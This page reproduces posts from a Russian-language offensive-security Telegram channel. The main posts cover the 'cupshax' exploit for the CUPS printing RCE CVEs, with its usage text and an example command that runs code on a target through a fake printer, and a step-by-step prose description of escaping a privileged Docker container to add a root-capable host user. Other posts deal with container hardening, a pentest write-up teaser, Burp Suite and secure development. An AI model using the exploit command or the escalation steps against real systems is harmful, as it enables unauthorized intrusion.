Похек
16.6K subscribers
2.19K photos
114 videos
243 files
3.15K links
All materials published on the channel are for educational and informational purposes only.

Мнение автора ≠ мнение компании, где работает автор

Чат: @poxek_chat

Реклама: @szybnev или
https://telega.in/c/poxek

РКН: https://clck.ru/3FsVhp
Download Telegram
This media is not supported in your browser
VIEW IN TELEGRAM
🐧 Cupshax - RCE через службу печати в UNIX
#unix #RCE #CVE

CVE-2024-47176 CVE-2024-47076 CVE-2024-47175 CVE-2024-47177

Вчера вечером интернет наводнился новостью о новой баге в UNIX системах, которая позволяет выполнить неавторизованный RCE. Но были особые условия, к примеру что должна быть очередь на печать. В прикрепленном видосе демонстрируется PoC.

🛠 Изучить райтап ТУТ

Авторы эксплойта изучили коммит в OpenPrinting CUPS, в котором была исправлена бага и написали эксплойт. Он использует dns-sd обнаружение принтера, требуя, чтобы цель могла получить широковещательное сообщение, т.е. находилась в той же сети.

➡️Использование
usage: cupshax.py [-h] [--name NAME] --ip IP [--command COMMAND] [--port PORT]

A script for executing commands remotely

options:
-h, --help show this help message and exit
--name NAME The name to use (default: RCE Printer)
--ip IP The IP address of the machine running this script
--command COMMAND The command to execute (default: 'touch /tmp/pwn')
--port PORT The port to connect on (default: 8631)


➡️Пример использования
python cupshax.py --name "Print to PDF (Color)" \
--command "id>/tmp/pwn" \
--ip 10.0.0.3


📱 Github и мой форк, на случай удаления репы

🌚 @poxek | 📺 RuTube | 🌚 Мерч Похек
Please open Telegram to view this post
VIEW IN TELEGRAM
11👍22🔥722
Ставьте плюс в комментах кто уже на underconf.ru и кто приедет ещё
😁6👍2
Forwarded from BugXplorer (j b)
🔥14👍321
Похек
Ставьте плюс в комментах кто уже на underconf.ru и кто приедет ещё
Теперь и я на точке сбора
🔥4😁3
Underconf в Холидей ИНН
#underconf

Очень атмосферная конференция, с крутыми спецами на площадке!

Могу ещё добавить, что тут классные стенды, есть локпик, Half-Life, CS 1.6, WarHammer на ЭЛТ Мониторах))

underconf.ru

🌚 @poxek
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
23🔥13👍9😁2🌚1
Доклад про IOT от @crytech7
#iot

Начался раньше

🌚 @poxek
Please open Telegram to view this post
VIEW IN TELEGRAM
😁1231🔥1
🖼️ Как собрать контейнер и не вооружить хакера
#docker #контейнер #k8s

Проблемы с безопасностью
Типичные проблемы, связанные с информационной безопасностью контейнеров:

Уязвимые компоненты. Когда вы деплоите и собираете контейнер с уязвимыми компонентами, то они никуда не денутся и всегда будут в нём присутствовать.

Ошибки конфигурации. Когда в среде выполнения контейнеров или в самих контейнерах допущены ошибки при конфигурировании, злоумышленник может этим воспользоваться.

Наличие root-пользователя в контейнере. Эта проблема может звучать немного по-детски. Но это бич многих компаний — часто у них запускаются продукты от привилегированного пользователя внутри контейнеров. Тоже запускаете свои приложения в контейнере под root’ом? Мы расскажем, почему так однозначно не стоит делать.

➡️Читать далее

🌚 @poxek | 📺 RuTube | 🌚 Мерч Похек
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥16👍4
Безопасность на автопилоте: взламываем авиакомпанию, чтобы летать бесплатно
#бастион #авиа

От себя добавлю, что статья большая, подробная и поэтому максимально рекомендую к прочтению!

Представьте: вы заказываете пентест, ожидая найти пару-тройку мелких багов, а в итоге получаете отчет, от которого волосы встают дыбом даже у бывалых айтишников. Знакомая ситуация? Нет? Пристегните ремни — сейчас будет турбулентность.
Сегодня у нас в блоге горячая история о том, как одна авиакомпания чуть не отправилась на небеса кибербезопасности. В этой статье мы разберем, как наша команда прошла путь от невинной SSRF-уязвимости до полного контроля над доменом заказчика. Спойлер: по пути мы нашли возможность генерировать бесконечные промокоды, отправлять SMS от имени компании и даже заглянули в святая святых — систему 1С.

❤️ Временно убрали публикацию

🌚 @poxek | 📺 RuTube | 🌚 Мерч Похек
Please open Telegram to view this post
VIEW IN TELEGRAM
👍27🔥106
Forwarded from КИБЕР МЕДИА
😎 Burp Suite: надежный инструмент пентестера или источник головной боли

Burp Suite — это широко известный инструмент для пентестеров и багхантеров, который позволяет проводить глубокий анализ безопасности приложений. Он содержит массу функций и возможностей, но вместе с тем может представлять и серьезные вызовы.

➡️ В новой статье на сайте разобрались, с какими трудностями сталкиваются пентестеры при использовании Burp Suite, как справиться с «крякнутыми» версиями и есть ли альтернативы этому инструменту.
Please open Telegram to view this post
VIEW IN TELEGRAM
👍115😁3
Forwarded from Похек meme
Please open Telegram to view this post
VIEW IN TELEGRAM
😁76🔥7👍2🌚1
Docker Privilege Escalation
#docker #privesc

Прикольная техника, почему-то раньше о ней не задумывался. Начал вроде бы обычное, монтируем в привилегированный контейнер файловую систему. Далее через chroot создаём нового пользователя в хостовой файловой системе, но от имени рута нашего контейнера. Устанавливаем пароль. Далее чтобы добавить рута, нам необходимо создать группу sudo, а чтобы её создать надо установить sudo внутрь контейнера. Далее создаём группу sudo, добавляем в неё нашего нового пользователя. Заходим на хостовую систему и спокойно авторизуемся под новым пользователем с помощью su <user>. Добавляем себя в sudoers и вауля. Всё готово :D

➡️ Читать понятнее подробнее

🌚 @poxek | 📺 RuTube | 🌚 Мерч Похек
Please open Telegram to view this post
VIEW IN TELEGRAM
😁12👍2
Forwarded from AKTIV.CONSULTING
⚙️Нужна ли безопасная разработка вендору коммерческого ПО?

Недавно мы рассматривали, в каких ситуациях организациям стоит задуматься о внедрении процесса безопасной разработки программного обеспечения (БРПО). Сегодня давайте обсудим, нужна ли БРПО вендорам коммерческого ПО.

➡️Если рассматривать внедрение процессов БРПО с экономической точки зрения, очевидно, что дополнительные затраты на данные процессы влияют на себестоимость продукта и компенсируются за счет увеличения его стоимости для клиентов. Возрастание цены может позитивно восприниматься клиентами при условии повышения ценности от продукта, а также в случае дополнительных бенефитов безопасности (что не всегда очевидно).

➡️Кроме того, при внедрении БРПО компания может получить возможность поставки своих продуктов организациям или целым отраслевым сегментам, которые ранее были недоступны из-за специфических внутренних или регуляторных требований.

➡️С другой стороны, игнорирование вопросов безопасности в ходе разработки ПО может привести к незапланированным расходам на исправления уязвимостей, которые выявляются в коммерческой эксплуатации. Это может спровоцировать ощутимый рост себестоимости, не лучшим образом повлиять на репутацию компании-разработчика, а также отразиться на экономических показателях.


Если вендор коммерческого ПО задумывается о необходимости внедрения подходов безопасной разработки и не находит однозначного ответа, рекомендуем ответить на следующие вопросы:

Насколько для ваших пользователей важна безопасность?
Готов ли пользователь заплатить чуть больше за ПО, получив гарантии безопасности?
Соизмерима ли стоимость по устранению уязвимостей и возможный ущерб репутации компании со стоимостью внедрения процессов БРПО?
Получит ли компания новые рынки, выполнив требования по безопасной разработке?

Если хотя бы на 2 вопроса вы ответили положительно, рекомендуем задуматься о внедрении процесса безопасной разработки.

#БРПО #DevSecOps

💬tg_AC
Please open Telegram to view this post
VIEW IN TELEGRAM
👍62